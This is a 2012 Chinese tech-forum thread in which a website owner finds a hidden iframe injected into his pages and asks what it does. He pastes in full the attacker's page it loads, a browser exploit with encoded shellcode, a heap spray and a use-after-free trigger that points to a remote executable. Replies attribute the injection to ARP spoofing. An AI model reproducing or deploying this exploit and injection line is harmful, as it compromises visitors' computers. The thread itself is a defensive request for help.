网站被人加了一行代码

水木社区手机版

主题:网站被人加了一行代码
楼主|oneway|2012-10-27 16:01:46|展开
今天打开网站，360杀毒报警说网站上下载下来的网页文件有恶意程序。
客户端，查看源代码。发现网页开头被加了一行代码
<iframe src= http://123.254.104.104:8080/hack.htm width=0 height=0></iframe>
这个ip不是我的，但和我是一个ip段的。
打开hack.html是下面一段代码
<script language="JavaScript"http://123.254.104.104:8080/server.exe>

var shellcode=unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

var array = new Array();

var ls = 0x100000-(shellcode.length*2+0x01020);

var b = unescape("%u0D0D%u0D0D");
while(b.length<ls) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xD0; i++) {
array[i] = lh + shellcode;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script>
--
FROM 123.171.51.*
1楼|oneway|2012-10-27 16:03:47|展开
查看我自己的网站程序，根本就没有这行代码，好像也没有被动过的痕迹。
但是在客户端浏览器查看源代码，却被加了这样一行代码。
这是如何做到的?这个“病毒”是干什么的？
除了360报毒，和网页显示有点儿异常之外，暂时没发现其他情况。

【在 oneway 的大作中提到: 】
: 今天打开网站，360杀毒报警说网站上下载下来的网页文件有恶意程序。
: 客户端，查看源代码。发现网页开头被加了一行代码
: <iframe src= http://123.254.104.104:8080/hack.htm width=0 height=0></iframe>
: ...................
--
修改:oneway FROM 123.171.51.*
FROM 123.171.51.*
3楼|oneway|2012-10-27 16:06:36|展开
网站，php
【在 offeroffer (offeroffer) 的大作中提到: 】
: 标题: Re: 网站被人加了一行代码
: 发信站: 水木社区 (Sat Oct 27 16:05:03 2012), 站内
:
: 这个程序是干嘛用的？
:
: 【在 oneway (抵制百度一党独大，支持搜搜和谷歌) 的大作中提到: 】
: : 查看服务器端程序，根本就没有这行代码，好像也没有被动过的痕迹。
: : 但是在客户端浏览器查看源代码，却被加了这样一行代码。
: : 这是如何做到的?这是被人黑了吗？
: : ...................
:
: --
:
: ※ 来源:·水木社区 newsmth.net·[FROM: 222.216.110.*]
--
FROM 123.171.51.*
5楼|oneway|2012-10-27 16:28:17|展开
可能是吧，给机房工作人员反映之后，很快就解决了。

【在 chaobill (若我离去,后会无期) 的大作中提到: 】
: 标题: Re: 网站被人加了一行代码
: 发信站: 水木社区 (Sat Oct 27 16:27:10 2012), 站内
:
: 机房有 arp 病毒？
: 【在 oneway (抵制百度一党独大，支持搜搜和谷歌) 的大作中提到: 】
: : 查看我自己的网站程序，根本就没有这行代码，好像也没有被动过的痕迹。
: : 但是在客户端浏览器查看源代码，却被加了这样一行代码。
: : 这是如何做到的?这个“病毒”是干什么的？
: : ...................
:
: --
: 一个只知道所谓互联网精神的公司，会死的很难看，尤其是在那些还没有长成人形的公司！
: 1. Everything changes and ends. 所有的事情在变化，都有终结
: 2. Things do not always go according to plan. 事情总会出乎意料（计划）之外
: 3. Life is not always fair. 生活并不总是公平
: 4. Pain is part of life. 痛苦是生活的一部分
: 5. People are not loving and loyal all the time. 人们并不总是热爱和忠诚
:
:
: ※ 来源:·水木社区 newsmth.net·[FROM: 211.99.222.*]
--
FROM 123.171.51.*
6楼|oneway|2012-10-27 16:29:15|展开
这病毒是干什么用的？有遗留问题吗？还需要善后处理吗？
【在 chaobill (若我离去,后会无期) 的大作中提到: 】
: 标题: Re: 网站被人加了一行代码
: 发信站: 水木社区 (Sat Oct 27 16:27:10 2012), 站内
:
: 机房有 arp 病毒？
: 【在 oneway (抵制百度一党独大，支持搜搜和谷歌) 的大作中提到: 】
: : 查看我自己的网站程序，根本就没有这行代码，好像也没有被动过的痕迹。
: : 但是在客户端浏览器查看源代码，却被加了这样一行代码。
: : 这是如何做到的?这个“病毒”是干什么的？
: : ...................
:
: --
: 一个只知道所谓互联网精神的公司，会死的很难看，尤其是在那些还没有长成人形的公司！
: 1. Everything changes and ends. 所有的事情在变化，都有终结
: 2. Things do not always go according to plan. 事情总会出乎意料（计划）之外
: 3. Life is not always fair. 生活并不总是公平
: 4. Pain is part of life. 痛苦是生活的一部分
: 5. People are not loving and loyal all the time. 人们并不总是热爱和忠诚
:
:
: ※ 来源:·水木社区 newsmth.net·[FROM: 211.99.222.*]
--
FROM 123.171.51.*
8楼|oneway|2012-10-27 17:05:20|展开
了解了，谢谢指教。
【在 Australia (. )( .) 的大作中提到: 】
: 标题: Re: 网站被人加了一行代码
: 发信站: 水木社区 (Sat Oct 27 16:46:49 2012), 站内
:
: 看到
: for(var x=0;x<500;x++) a1.push(document.createElement("img"));
: 这应该是让浏览器内存溢出执行最上面那个shellcode的代码，不影响服务器，如果网站用户用了对应的有漏洞的浏览器（或浏览器插件），他的电脑就挂了，然后泄漏各种信息之类的，你要觉着这对你网站的使用有影响的话就跟网站用户提个醒
:
: 【在 oneway (抵制百度一党独大，支持搜搜和谷歌) 的大作中提到: 】
: : 这病毒是干什么用的？有遗留问题吗？还需要善后处理吗？
:
: --
: 广而告之：一个人做的在地图上发文的游记分享系统 http://travellershut.net/ 已经上线了，还不很完善不过每天都在更新，希望大家能支持……
:
:
: 旅行照片陆续上传中：http://www.panoramio.com/user/6951196
:
: 钓鱼/Fishing版开张了！欢迎来灌水～
:
:
: ※ 来源:·水木社区 http://newsmth.net·[FROM: 220.233.113.*]
--
FROM 123.171.51.*